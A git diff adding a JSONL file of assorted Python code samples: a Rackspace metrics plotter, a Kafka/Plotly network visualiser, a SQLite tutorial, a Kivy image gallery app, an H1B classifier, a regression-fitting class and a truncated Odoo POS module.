diff --git "a/6245.jsonl" "b/6245.jsonl"
new file mode 100644
--- /dev/null
+++ "b/6245.jsonl"
@@ -0,0 +1,706 @@
+{"seq_id":"545240774","text":"import requests\nimport json\nimport sys\nimport re\nfrom subprocess import check_output\n\ndef list_metrics(entity,check):\n ts_from = \"1378684800000\" # Mon, 09 Sep 2013 00:00:00 GMT\n ts_to = \"1388534399000\" # Tue, 31 Dec 2013 23:59:59 GMT\n points = 1\n resolution = \"MIN1440\" # FULL, MIN5, MIN20, MIN60, MIN240, MIN1440\n rax_internal_mon_ddi = \"699373\" # THIS IS NOT THE CUSTOMER'S DDI, BUT THE ACCOUNT BEING USED FOR THE MONITORING.\n\n output = check_output([\"raxmon-metrics-list --entity-id=\" + entity + \" --check-id=\" + check + \" --debug 2>&1\"], shell=True)\n # get token\n m = re.search(r'{\"access.*}}}',output) \n data = \"\"\n if m:\n result = m.group(0)\n data = json.loads(result)\n\n # get rid of newlines for easier parsing\n output = re.sub(r'\\n','',output)\n rax_token = data['access']['token']['id']\n m = re.search(r'{ \"values\".*}}', output)\n if m:\n r = m.group(0)\n data = json.loads(r)\n \n metrics = []\n for i in data['values']:\n #print(i['name'])\n metrics.append(i['name'])\n\n headers = {'X-Auth-Token': rax_token}\n all_metrics = []\n for metrics_iterator in metrics:\n url = \"https://monitoring.api.rackspacecloud.com:443/v1.0/\" + rax_internal_mon_ddi\n url += \"/entities/\" + entity + \"/checks/\" + check + \"/metrics/\" + metrics_iterator\n url += \"/plot?from=\" + ts_from + \"&to=\" + ts_to\n #url += \"&points=\" + str(points)\n url += \"&resolution=\" + resolution\n #print(url)\n r = requests.get(url,headers=headers)\n metrics_json = json.loads(r.text)\n # add the DC and metric to the dict\n dc_metric = metrics_iterator.split(\".\")\n metrics_json['dc'] = dc_metric[0]\n metrics_json['metric'] = dc_metric[1]\n all_metrics.append(metrics_json)\n print(\"Metric: \" + metrics_iterator)\n #print(r.text)\n #return_avg(json.loads(r.text))\n\n plot_metric(all_metrics)\n\ndef plot_metric(metrics_list):\n '''\n Get data ready to be plotted. Group by DC.\n '''\n to_plot = \"\"\n js_func = '''\n(function($){\n$(function () {\n $('#container').highcharts({\n chart: {\n type: 'spline'\n },\n title: {\n text: ' per DC'\n },\n subtitle: {\n text: 'subtitle-text'\n },\n xAxis: {\n type: 'datetime',\n dateTimeLabelFormats: { // don't display the dummy year\n month: '%e. %b',\n year: '%b'\n }\n },\n yAxis: {\n title: {\n text: 'unit-of-measure'\n },\n min: 0\n },\n tooltip: {\n formatter: function() {\n return '<b>'+ this.series.name +'</b><br/>'+\n Highcharts.dateFormat('%e. %b', this.x) +': '+ this.y +' UNITS';\n }\n },\n\n series: [\n'''\n\n data_sets = []\n #for metric_type in \"tt_firstbyte\", \"tt_connect\", \"truncated\", \"duration\", \"bytes\", \"available\", \"average\"\n #for metric_type in \"tt_connect\", \"tt_firstbyte\":\n for metric_type in \"available\", \"average\":\n #print(js_func)\n to_plot += js_func\n for metric in metrics_list:\n if metric_type in metric['metric']:\n #print(\"\\n\" + metric['dc'] + \":\" + metric['metric'])\n #print(\"{name: '\" + metric['dc'] + \".\" + metric['metric'] + \"', marker: {enabled: false}, data: [\")\n to_plot += \"{name: '\" + metric['dc'] + \".\" + metric['metric'] + \"', marker: {enabled: false}, data: [\"\n for val in metric['values']:\n # build data set to be plotted\n #print(\"[\" + str(val['timestamp']) + \", \" + str(val['average']) + \"],\") \n to_plot += \"[\" + str(val['timestamp']) + \", \" + str(val['average']) + \"],\"\n #print(val['timestamp'], val['average'])\n #print(\"],lineWidth: 1,},\")\n to_plot += \"],lineWidth: 1,},\"\n #print(\"]\")\n to_plot += \"]\"\n #print(\"\\n});\\n }); \\n})(jQuery);\")\n to_plot += \"\\n});\\n }); \\n})(jQuery);\"\n data_sets.append(to_plot)\n to_plot = \"\"\n\n for plotset in data_sets:\n print(plotset)\n\ndef return_avg(metric_dict):\n '''\n Return straight average from daily averages.\n '''\n if metric_dict['metadata']['count'] == 0:\n return 0\n avg_sum = 0\n average = 0\n for daily in metric_dict['values']:\n avg_sum += daily['average']\n average = avg_sum / metric_dict['metadata']['count']\n #print(\"Average is: \" + str(average))\n return average\n\n# guy with 2 HSD\nlist_metrics(\"enDuLvcLLH\",\"chNQOXbn6P\")\n\n# fishingammo.com\n#list_metrics(\"enjibMBsS1\",\"ch2BQSRR7R\") # ping\n#list_metrics(\"enjibMBsS1\",\"ch4DQLCsKD\") # http\n\n# vladimirneykov.com\n#list_metrics(\"en18VYUH85\",\"cheoNv7fwH\") # http\n#list_metrics(\"en18VYUH85\",\"chnMqu3ADf\") # ping\n\n#curl -XGET -H \"X-Auth-Token: \"$token \"https://monitoring.api.rackspacecloud.com:443/v1.0/699373/entitis/enDuLvcLLH/checks/chNQOXbn6P/metrics/mzord.available/plot?from=1378684800000&to=1378943700000&points=1\"\n","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"609902824","text":"# url : 127.0.0.1\r\nimport plotly.graph_objects as go\r\nimport time\r\nfrom kafka import KafkaConsumer\r\nimport sys\r\n\r\nbootstrap_servers = ['localhost:9091','localhost:9092','localhost:9090']\r\ntopicName = 'xdp_kafka_topic'\r\n\r\nconsumer = KafkaConsumer (topicName, group_id = 'group1', bootstrap_servers = bootstrap_servers, auto_offset_reset = 'earliest')\r\n\r\ntest_value1 = 14\r\ntest_value2 = 2\r\n\r\nmid_val3 = [0,0,0]\r\n# define colors codes here\r\nRED = \"#ff0000\"\r\nDARK_GREEN = \"#224d17\"\r\nGREEN = \"#099441\"\r\nLIGHT_GREEN = \"#60a830\"\r\nYELLOW_GREEN = \"d9df1d\"\r\nBLACK = \"#000000\"\r\nWHITE = \"#FFFFFF\"\r\nGRAY = \"#808080\"\r\nSILVER = \"C0C0C0\"\r\n# define parameter values for coloring\r\n\r\nLEVEL0 = 0\r\nLEVEL1 = 10\r\nLEVEL2 = 15\r\nLEVEL3 = 20\r\nLEVEL4 = 25\r\nLEVEL5 = 30\r\nLEVEL6 = 35\r\n\r\n# define level colors here\r\n\r\nLEVEL0_COL = GRAY\r\nLEVEL1_COL = YELLOW_GREEN\r\nLEVEL2_COL = LIGHT_GREEN\r\nLEVEL3_COL = GREEN\r\nLEVEL4_COL = DARK_GREEN\r\nLEVEL5_COL = RED\r\n \r\ndef kafka_consumer():\r\n print(\"Kafka consumer initiating...\")\r\n try :\r\n for message in consumer:\r\n value = message.value\r\n# if (value[0] != '0'):\r\n print(value)\r\n print('\\n')\r\n except KeyboardInterrupt:\r\n sys.exit()\r\n\r\ndef draw_graph():\r\n iterator = 0\r\n print(\"Kafka consumer initiating...\")\r\n try :\r\n for message in consumer:\r\n test_value1 = message.value\r\n test_value1 = str(test_value1)\r\n# if (value[0] != '0'):\r\n print(test_value1)\r\n print('\\n')\r\n print(\"Kafka consumer initiaing...\")\r\n# from here, disect the packet and the ip address\r\n \r\n disector = test_value1.find(' ')\r\n\r\n# disector -> address + ' ' + packet/sec\r\n print('\\n')\r\n print(\"ip address : \")\r\n ip_address = test_value1[0:disector]\r\n print(ip_address)\r\n print(\"incoming packets : \")\r\n packets = test_value1[disector+1:]\r\n print(packets)\r\n \r\n\r\n# assign color codes here since I believe color assignment should be done for both components all the time\r\n# later for the economy of the code, two paragraphs below can be merged into one using list : {bpf1,bpf2} and iterating it\r\n if packets == LEVEL0:\r\n bpf2_color = LEVEL0_COL\r\n elif LEVEL0 < packets and packets < LEVEL1 :\r\n bpf2_color = LEVEL1_COL\r\n elif LEVEL1 <= packets and packets < LEVEL2 :\r\n bpf2_color = LEVEL2_COL\r\n elif LEVEL2 <= packets and packets < LEVEL3 :\r\n bpf2_color = LEVEL3_COL\r\n elif LEVEL3 <= packets and packets < LEVEL4 :\r\n bpf2_color = LEVEL4_COL\r\n else :\r\n bpf2_color = LEVEL5_COL\r\n\r\n if test_value2 < LEVEL1 :\r\n bpf3_color = LEVEL1_COL\r\n elif LEVEL1 <= test_value2 and test_value2 < LEVEL2 :\r\n bpf3_color = LEVEL2_COL\r\n elif LEVEL2 <= test_value2 and test_value2 < LEVEL3 :\r\n bpf3_color = LEVEL3_COL\r\n elif LEVEL3 <= test_value2 and test_value2 < LEVEL4 :\r\n bpf3_color = LEVEL4_COL\r\n else :\r\n bpf3_color = LEVEL5_COL\r\n\r\n# Each arguments below have to be assigned only a single time. IF NOT -> ERROR\r\n fig =go.Figure(go.Sunburst(\r\n labels=[\" \" ,\"Kubernetes Master\", \"Kubernetes Worker\", \"DoS Attacker\",\"Ethernet(eno2) \",\"Netronome(enp4s0np1)\",\"Ethernet(eno2)\",\"Netronome(enp32s0np1\",\"Ethernet(eno1)\",\"Intel(enp6s0f0)\"],\r\n# all the settings below probably follows the order of the labels above\r\n\t parents=[\"\",\" \",\" \",\" \",\"Kubernetes Master\",\"Kubernetes Master\",\"Kubernetes Worker\",\"Kubernetes Worker\",\"DoS Attacker\",\"DoS Attacker\"],\r\n#\t values=[20, 20, 20,20], # size of each components of the graph # this line decides the size of the components on the onion-ring. Leaving this blank will result in equal sizing for every component\r\n# values = [BPF2, BPF3, BPF1] : BFP1 size doesn't really change\r\n\t hoverlabel = {\"bordercolor\":BLACK}, # sets the border color of mouse over\r\n marker = {\"colors\":[WHITE,BLACK,BLACK,BLACK,YELLOW_GREEN,GRAY,YELLOW_GREEN,GRAY,YELLOW_GREEN,GRAY]}, # in the order of BPF2, BPF3\r\n\t hovertext = ['','','','','','','','192.168.1.10'],\r\n\t hoverinfo = [\"label+text\"],\r\n ))\r\n fig.update_layout(margin = dict(t=0, l=0, r=0, b=0))\r\n go.visible = False\r\n# if (test_value1 > 50):\r\n fig.show()\r\n except KeyboardInterrupt:\r\n sys.exit() \r\n \r\n\r\ndraw_graph()\r\n#kafka_consumer()\r\n","sub_path":"Visibility-Agent/IOVisor/visualization_kafka_onionring.py","file_name":"visualization_kafka_onionring.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"49450822","text":"from collections import namedtuple\nimport sqlite3\n\n# make a basic Person class\nPerson = namedtuple('Person', ['first_name', 'last_name', 'e_mail'])\ncontacts = [ \n Person('Jon', 'Flanders', 'jon@company.com')]\n\n# make and populate a table\ndb = sqlite3.connect(':memory:')\ndb.execute('CREATE TABLE person ' +\n '(first_name text, last_name text, e_mail text)')\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Fritz', 'Onion');\")\ndb.execute(\"UPDATE person SET e_mail='fritz@company.com' WHERE first_name='Fritz';\")\n\nfor contact in contacts:\n db.execute('INSERT INTO person VALUES (?, ?, ?);', contact)\n\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Keith', 'Porteous');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Jon', 'McCracken');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Jon', 'Ahern');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('James', 'Lifferth');\")\ndb.execute(\"INSERT INTO person (first_name, last_name) VALUES ('Brian', 'Curtis');\")\n\n\ndef execute_sql_command():\n \"\"\"\n English question: What is the last name of all the people I know whose first name is Jon?\n \"\"\"\n sql_statement = \"\"\"\n SELECT p.last_name as LastName\n FROM person p\n WHERE p.first_name='Jon'\n ORDER BY LastName;\n \"\"\"\n cursor = db.execute(sql_statement)\n\n for row in cursor:\n yield row\n\n\nif __name__ == '__main__':\n for result in execute_sql_command():\n print(result)\n","sub_path":"ud171_backend/06_databases/introduction_to_sql/03_filtering_results_WHERE.py","file_name":"03_filtering_results_WHERE.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"538895386","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nfrom kivy import platform\nfrom kivy.app import App\nfrom kivy.config import Config\nfrom kivy.logger import Logger\nfrom kivy.loader import Loader\nfrom kivy.properties import BooleanProperty\n\nfrom image import CachedImage, clear_cache # Used in the kv file\nfrom imagedir import ImageDir, ImageCarousel\n\nif platform == 'android':\n Logger.debug('KBGALLERY: Importando %s' % datetime.now())\n import android\n from jnius import autoclass, cast\n from android.runnable import run_on_ui_thread\n Intent = autoclass('android.content.Intent')\n String = autoclass('java.lang.String')\n PythonActivity = autoclass('org.renpy.android.PythonActivity')\n activity = PythonActivity.mActivity\n\nif platform == 'win' or platform == 'linux':\n Config.set('graphics', 'width', 480)\n Config.set('graphics', 'height', 756)\n\nAPP = 'KBGALLERY'\nDIR = 'dir'\nFILE = 'file'\n__version__ = \"0.0.1\"\n\n\nclass KBGalleryApp(App):\n\n delay_image_loading = BooleanProperty(False)\n\n def build(self):\n Logger.debug(\"%s: build %s \" % (APP, datetime.now()))\n self.use_kivy_settings = False\n return self.root\n\n def build_config(self, config):\n Logger.debug(\"%s: build_config %s \" % (APP, datetime.now()))\n config.setdefaults('general', {\n 'server_url': 'http://www.lazaro.es:8888/',\n })\n\n def build_settings(self, settings):\n Logger.debug(\"%s: build_settings %s \" % (APP, datetime.now()))\n settings.add_json_panel('KBGallery', self.config, 'settings.json')\n\n def on_pause(self):\n return True\n\n def on_resume(self):\n Logger.debug(\"%s: On resume %s\" % (APP, datetime.now()))\n\n def on_new_intent(self, intent):\n Logger.debug(\"%s: on_new_intent %s %s\" % (\n APP, datetime.now(), intent.toString()))\n\n def on_keypress(self, window, keycode1, keycode2, text, modifiers):\n # Logger.debug(\"%s: on_keypress k1: %s, k2: %s, text: %s, mod: %s\" % (\n # APP, keycode1, keycode2, text, modifiers))\n\n if keycode1 in [27, 1001]:\n if self._app_settings in self._app_window.children:\n self.close_settings()\n return True\n else:\n self.load_previous()\n return True\n return False\n\n def on_start(self):\n Logger.debug(\"%s: on_start %s\" % (APP, datetime.now()))\n\n from kivy.core.window import Window\n Window.bind(on_keyboard=self.on_keypress)\n\n if platform == 'android':\n android.map_key(android.KEYCODE_BACK, 1001)\n\n import android.activity as python_activity\n python_activity.bind(on_new_intent=self.on_new_intent)\n self.on_new_intent(activity.getIntent())\n\n self.server_url = self.config.get('general', 'server_url')\n\n self.root.bind(\n on_touch_down=lambda *a: setattr(self, 'delay_image_loading', True),\n on_touch_up=lambda *a: setattr(self, 'delay_image_loading', False))\n\n imagedir = ImageDir(server_url=self.server_url)\n wp = 'with_previous'\n imagedir.bind(\n on_navigate_top=lambda *a: setattr(self.root, wp, False),\n on_navigate_down=lambda *a: setattr(self.root, wp, True),\n on_img_selected=self.load_carousel,\n path=lambda w,v: setattr(self.root, 'title', v),\n on_loading_start=lambda *a: setattr(self.root, 'loading', True),\n on_loading_stop=lambda *a: setattr(self.root, 'loading', False))\n self.imagedir = imagedir\n\n self.root.container.add_widget(imagedir)\n self.root.bind(on_touch_down=lambda *a: Loader.pause(),\n on_touch_up=lambda *a: Loader.resume())\n Loader.max_upload_per_frame = 1 # Maximize interactivity\n\n def on_stop(self):\n pass\n\n def reload_content(self):\n content = self.root.container.children[0]\n content.reload()\n\n def clear_image_cache(self):\n clear_cache()\n return True\n\n def load_previous(self, *args):\n try:\n content = self.root.container.children[0]\n except:\n return\n if type(content) == ImageDir:\n self.imagedir.load_previous()\n elif type(content) == ImageCarousel:\n self.root.container.remove_widget(self.imagecarousel)\n self.root.container.add_widget(self.imagedir)\n self.imagecarousel = None\n else:\n Logger.error(\"Unknown content type %s\" % type(content))\n\n def load_carousel(self, widget, path, fn):\n self.root.container.remove_widget(self.imagedir)\n imagecarousel = ImageCarousel(server_url=self.server_url, path=path,\n filename=fn)\n self.root.container.add_widget(imagecarousel)\n self.imagecarousel = imagecarousel\n\n def on_config_change(self, config, section, key, value):\n Logger.debug(\"%s: on_config_change key %s %s\" % (\n APP, key, value))\n try:\n content = self.root.container.children[0]\n except:\n return\n if key == 'server_url':\n if type(content) == ImageCarousel:\n self.load_previous()\n content.server_url = value\n\n if platform == 'android':\n @run_on_ui_thread\n def toast(self, text=\"texto\", short=True):\n Logger.debug(\"%s: texto %s, short %s\" % (\n APP, text.encode('ascii', 'ignore'), short))\n Toast = autoclass('android.widget.Toast')\n Gravity = autoclass('android.view.Gravity')\n duration = Toast.LENGTH_SHORT if short else Toast.LENGTH_LONG\n t = Toast.makeText(activity, String(text), duration)\n t.setGravity(Gravity.BOTTOM, 0, 0)\n t.show()\n else:\n def toast(*args, **kwargs):\n pass\n\n def send_log(self):\n if platform != 'android':\n return\n Logger.debug(\"%s: send_log %s\" % (APP, datetime.now()))\n\n from subprocess import Popen\n Uri = autoclass('android.net.Uri')\n File = autoclass('java.io.File')\n FileOutputStream = autoclass('java.io.FileOutputStream')\n Build = autoclass('android.os.Build')\n BV = autoclass('android.os.Build$VERSION')\n\n try:\n f = open(\"log.txt\", \"w\")\n fa = File(activity.getExternalFilesDir(None), \"log.txt\")\n p1 = Popen([\"/system/bin/logcat\", \"-d\"], stdout=f)\n p1.wait()\n out = FileOutputStream(fa)\n f.close()\n f = open(\"log.txt\", \"r\")\n out.write(\"\".join(f.readlines()))\n except Exception as e:\n Logger.debug(\"%s: Log creation failed %s\" % (APP, str(e)))\n finally:\n f.close()\n out.close()\n\n texto = \"%s\\n%s\\n%s\\n%s\\n\\n\" % (\n Build.MANUFACTURER, Build.MODEL, BV.RELEASE, self.about())\n\n intent = Intent(Intent.ACTION_SEND).setType('message/rfc822')\n intent = intent.putExtra(Intent.EXTRA_TEXT, String(texto))\n intent = intent.putExtra(Intent.EXTRA_EMAIL, [\"toledo+kbgallery@lazaro.es\"])\n intent = intent.putExtra(Intent.EXTRA_SUBJECT, String(\"KBGallery Log\"))\n try:\n intent = intent.putExtra(\n Intent.EXTRA_STREAM,\n cast('android.os.Parcelable', Uri.fromFile(fa)))\n\n activity.startActivity(Intent.createChooser(\n intent, String(\"Send Log with:\")))\n except Exception as e:\n Logger.debug(\"%s: Log delivery failed %s\" % (APP, str(e)))\n\n def about(self):\n try:\n with open(\"version.txt\") as f:\n v = f.read()[:-1]\n except:\n v = \"undefined\"\n self.toast(text=\"KBGallery %s\\nJuan Toledo\" % v, short=False)\n return v\n\nif __name__ == '__main__':\n Logger.debug(\"%s: End imports. %s KBGalleryApp().run()\" % (\n APP, datetime.now()))\n KBGalleryApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"501559887","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom datetime import datetime\nfrom sklearn.decomposition import PCA\nfrom sklearn.kernel_approximation import RBFSampler, Nystroem\nfrom sklearn.utils.class_weight import compute_class_weight\nfrom imblearn.over_sampling import SMOTE\n\npd.options.mode.chained_assignment = None\n\n\nstart_time = datetime.now()\nprint(start_time)\n\n\ndef get_chunks(data_len, chunksize):\n chunkstarter = 0\n while chunkstarter < data_len:\n print(\"chunk\",chunkstarter, datetime.now()-start_time)\n chunkender = chunkstarter + chunksize\n x_chunk, y_chunk = x_train.iloc[chunkstarter:chunkender], y_train.iloc[chunkstarter:chunkender]\n #x_chunk, y_chunk = smote.fit_sample(x_chunk, y_chunk)\n #x_chunk, y_chunk = x_train[chunkstarter:chunkender:1], y_train[chunkstarter:chunkender:1]\n \n yield x_chunk, y_chunk\n chunkstarter += chunksize\n \n#import cleaned H1B dataset\n#full dataset can be found: https://www.kaggle.com/nsharan/h-1b-visa/data\n#A description of cleanup can be found: https://github.com/Liptoni/Springboard/blob/master/H1B_Capstone/H1B_Data_Wrangling.docx\nhb_data = pd.read_csv('Z:/Springboard/H1B_Capstone/data/h1b_census_full.csv', index_col='CASE_NUMBER',\n dtype={'block_fips':np.object, 'county_fips':np.object, 'state_fips':np.object} )\n\n\n#drop NAs\nhb_data.dropna(inplace=True)\n\nprint('data cleaned', datetime.now()-start_time)\n\n#split data into labels and features\nlabels = hb_data['CERTIFIED']\nfeatures = hb_data[['FULL_TIME_POSITION', 'PREVAILING_WAGE','SOC_NAME','lon', 'lat', 'county_fips', 'county_pop', 'state_code']]\nfeatures= pd.get_dummies(features, drop_first=True)\n\n\nprint('dummies created', datetime.now()-start_time)\n\n\n# =============================================================================\n# #get class weights\n# weights = compute_class_weight(class_weight='balanced', classes=np.unique(labels), y=labels)\n# weights = {'certified':weights[0], 'denied':weights[1]}\n# \n# print('got weights', datetime.now()-start_time)\n# =============================================================================\n\n#get training and testing data\nx_train, x_test, y_train, y_test = train_test_split(features, labels, test_size = 0.25, random_state=24)\ndata_len = len(x_train)\n\n\nprint('data split', datetime.now()-start_time)\n\n# =============================================================================\n# #define SMOTE\n# smote = SMOTE(random_state = 24)\n# =============================================================================\n\n#split data into batches to meet memory requirements\nbatcher = get_chunks(data_len, 10000)\n\n#define SGD\nsgd = SGDClassifier(alpha=1, loss='hinge', max_iter=5, penalty='l2', tol=None)#, class_weight=weights\n\nscaler = StandardScaler()\n\n#Scale and partial fit classifier for each chunk\nfor x_chunk, y_chunk in batcher:\n x_scaled = scaler.fit_transform(x_chunk)\n sgd.partial_fit(x_scaled, y_chunk, classes=np.unique(labels))\n\n\n#Predict on test set, print results\nprint('predicting', datetime.now()-start_time)\n\ntest_scaled = scaler.fit_transform(x_test)\ny_pred = sgd.predict(test_scaled)\n\nprint(sgd.score(test_scaled, y_test))\nprint(classification_report(y_test, y_pred))\n\nprint(confusion_matrix(y_test, y_pred))\n\n\nprint(\"Done!\")\nprint(datetime.now()-start_time)\n\n\n\n\n","sub_path":"H1B_Capstone/python/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"492297802","text":"import numpy as np\nimport sys\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import Lasso, SGDRegressor\nfrom functions import sigmoid, softmax\nimport statistical_functions as statistics\n\nclass fit():\n def __init__(self, inst): \n self.inst = inst\n \n def create_design_matrix(self, x = 0, N = 0, deg = 0):\n \"\"\" Function for creating a design X-matrix.\n if deg > 0, a polynomial matrix of degree 'deg' for two variables will be \n created, with rows [1, x, y, x^2, xy, xy^2 , etc.]\n if deg == 0, a simple design matrix will be created. Useful for\n big datasets.\n Input for x is a dataset in the form of x_1d.\n Keyword argument deg is the degree of the polynomial you want to fit. \"\"\"\n \n if deg == 0:\n X = self.create_simple_design_matrix(x = x)\n return X\n else:\n X = self.create_polynomial_design_matrix(x = x, N = N, deg = deg)\n return X\n\n def create_simple_design_matrix(self, x = 0):\n ''' Create simple design matrix from a matrix of data. If x = 0, it will\n use the x_1d attribute of the imported dataset'''\n \n if isinstance(x, int):\n self.X = self.inst.x_1d\n else:\n self.X = x\n self.l = self.X.shape[1]\n return self.X \n \n def create_polynomial_design_matrix(self, x=0, N=0, deg=0):\n ''' Create a polynomial design matrix from a matrix of data. If x = 0, it will\n use the x_1d attribute of the imported dataset'''\n \n if isinstance(x, int):\n x = self.inst.x_1d\n N = self.inst.N\n\n self.x = x\n N = x.shape[0]\n \n self.l = int((deg + 1)*(deg + 2) / 2)\t\t# Number of elements in beta\n X = np.ones((N, self.l))\n \n #fit polynomial\n for i in range(1, deg + 1):\n q = int( i * (i + 1) / 2)\n for k in range(i + 1):\n X[:, q + k] = x[:,0]**(i - k) + x[:,1]**k\n \n #Design matrix\n self.X = X\n return X\n \n def fit_design_matrix_logistic_regression(self, descent_method = 'SGD-skl', eta = 0.001, Niteration = 200, m = 5, verbose = False):\n '''solve the model using logistic regression. \n Method 'SGD-skl' for SGD scikit-learn,\n method 'SGD' for SGD with diminishing step length with minibatches,\n method 'GD' for plain gradient descent'''\n \n n, p = np.shape(self.X)\n if descent_method == 'skl-SGD':\n sgdreg = SGDRegressor(max_iter = 50, penalty=None, eta0=eta, fit_intercept = True)\n sgdreg.fit(self.X, self.inst.y_1d.ravel())\n self.betas = sgdreg.coef_\n self.y_tilde = sigmoid(self.X@self.betas + sgdreg.intercept_)\n if verbose:\n # Cost function\n m = self.X.shape[0]\n cost = - (1 / m) * np.sum(self.inst.y_1d.ravel() * self.y_tilde + np.log(sigmoid(-self.y_tilde)))\n print('cost is', cost)\n \n return self.y_tilde, sgdreg.coef_\n \n elif descent_method == 'GD':\n #implement own gradient descent algorithm\n beta = np.ones((p, 1))\n X = self.X\n y = self.inst.y_1d[:, np.newaxis]\n for iter in range(Niteration):\n #Calculate probabilities\n y_tilde_iter = X @ beta\n prob = sigmoid(y_tilde_iter)\n compl_prob = sigmoid(-y_tilde_iter)\n \n #Calculate gradients\n gradients = - X.T @ (y - prob)\n \n #Update parameters\n beta -= eta*gradients * 2./len(y_tilde_iter)\n \n if verbose:\n # Cost function\n m = X.shape[0]\n cost = - (1 / m) * np.sum(y * y_tilde_iter + np.log(compl_prob))\n print('cost is', cost)\n self.betas = beta\n self.y_tilde = sigmoid(self.X @ beta)\n return self.y_tilde, self.betas\n \n elif descent_method == 'SGD':\n #implement own stochastic gradient descent algorithm\n self.inst.sort_in_k_batches(m, random=True, minibatches = True)\n \n #initialize step length. The step will start from the input value of\n #eta and will diminish at the rate of t0/(t + t1) where t = epoch*m + i\n t0 = 1.0\n t1 = t0/eta\n X = self.X\n y = self.inst.y_1d[:, np.newaxis]\n epochs = int(Niteration / m)\n beta = np.ones((p, 1))\n for epoch in range(0, epochs + 0):\n for i in range(m):\n \n # Pick random minibatch\n minibatch_k = np.random.randint(m)\n minibatch_data_idxs = self.inst.m_idxs[minibatch_k]\n X_k = X[minibatch_data_idxs,:]\n y_k = y[minibatch_data_idxs]\n \n # Calculate probabilities\n y_tilde_iter = X_k @ beta\n prob = sigmoid(y_tilde_iter)\n compl_prob = sigmoid(-y_tilde_iter)\n \n # Evaluate gradients\n gradients = - X_k.T @ (y_k - prob)\n \n # Update steplength\n t = epoch*m+i\n eta = t0/(t+t1)\n \n # Adjust parameters\n beta -= eta*gradients * 2./len(y_tilde_iter)\n \n if verbose:\n # Cost function\n m = X.shape[0]\n cost = - (1 / m) * np.sum(y * y_tilde_iter + np.log(compl_prob))\n print('cost is', cost)\n self.betas = beta\n self.y_tilde = sigmoid(self.X @ beta)\n return self.y_tilde, self.betas\n \n \n def fit_design_matrix_numpy(self):\n \"\"\"Method that uses the design matrix to find the coefficients beta, and\n thus the prediction y_tilde\"\"\"\n X = self.X\n y = self.inst.y_1d.ravel()\n \n beta = np.linalg.pinv(X.T.dot(X)).dot(X.T).dot(y)\n \n y_tilde = X @ beta\n return y_tilde, beta\n\n def fit_design_matrix_ridge(self, lambd):\n \"\"\"Method that uses the design matrix to find the coefficients beta with \n the ridge method, and thus the prediction y_tilde\"\"\"\n X = self.X\n y = self.inst.y_1d.ravel()\n\n beta = np.linalg.pinv(X.T.dot(X) + lambd*np.identity(self.l)).dot(X.T).dot(y)\n y_tilde = X @ beta\n return y_tilde, beta\n\n def fit_design_matrix_lasso(self, lambd, maxiter = 10e5):\n \"\"\"The lasso regression algorithm implemented from scikit learn.\"\"\"\n lasso = Lasso(alpha = lambd, max_iter = maxiter, tol = 0.01, normalize= (not self.inst.normalized), fit_intercept=(not self.inst.normalized))\n lasso.fit(self.X,self.inst.y_1d.ravel())\n beta = lasso.coef_\n y_tilde = self.X@beta\n return y_tilde, beta\n\n def test_design_matrix(self, beta, X = 0):\n \"\"\"Testing a design matrix with beta\"\"\"\n if isinstance(X, int):\n X = self.X\n y_tilde = X @ beta\n return y_tilde\n \n","sub_path":"fit_matrix.py","file_name":"fit_matrix.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"342307419","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport itertools\nimport logging\n\nfrom odoo import api, fields, models, tools, _\nimport requests\nimport time\nimport json\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ProductTemplateIngerit(models.Model):\n _inherit = 'product.template'\n\n property_stock_inventory_2 = fields.Many2one(\n 'stock.location', \"Inventory Location\",\n company_dependent=True, check_company=True,\n help=\"This stock location will be used, instead of the default one, as the source location for stock moves generated when you do an inventory.\")\n property_stock_comandera = fields.Many2one(\n 'stock.location', \"Inventory Location\",\n company_dependent=True, check_company=True,\n help=\"This stock location will be used, instead of the default one, as the source location for stock moves generated when you do an inventory.\")\n\nclass ProductTemplateInherit(models.Model):\n _inherit = \"res.currency\"\n\n @api.model\n def print_barcode(self):\n busqueda = self.env['res.currency.rate'].search([], order='id desc')\n if busqueda:\n rate = busqueda[0].rate\n return rate\n\nclass PosPaymentMethod(models.Model):\n _inherit = 'pos.payment.method'\n vpos_check = fields.Boolean(default=False)\n typo_vpos = fields.Selection([\n ('tarjeta', 'Vpos - Tarjetas'),\n ('cheque', 'Vpos - Cheque'),\n ])\n\nclass PosOrder(models.Model):\n _inherit = 'pos.order'\n\n @api.model\n def api_vpos_sent(self, id_metodo, cliente_id, amount):\n metodo = self.env['pos.payment.method'].search([('id','=', id_metodo)])\n info_data = []\n if metodo:\n if metodo.vpos_check == True:\n if cliente_id == 'False':\n return 'borrar'\n cliente = self.env['res.partner'].search([('id','=', cliente_id)])\n tipo_persona = cliente.company_type\n if tipo_persona == 'person':\n cedula = cliente.identification_id\n else:\n cedula = ''\n amount = format(amount, '.2f')\n info_data.append({\n 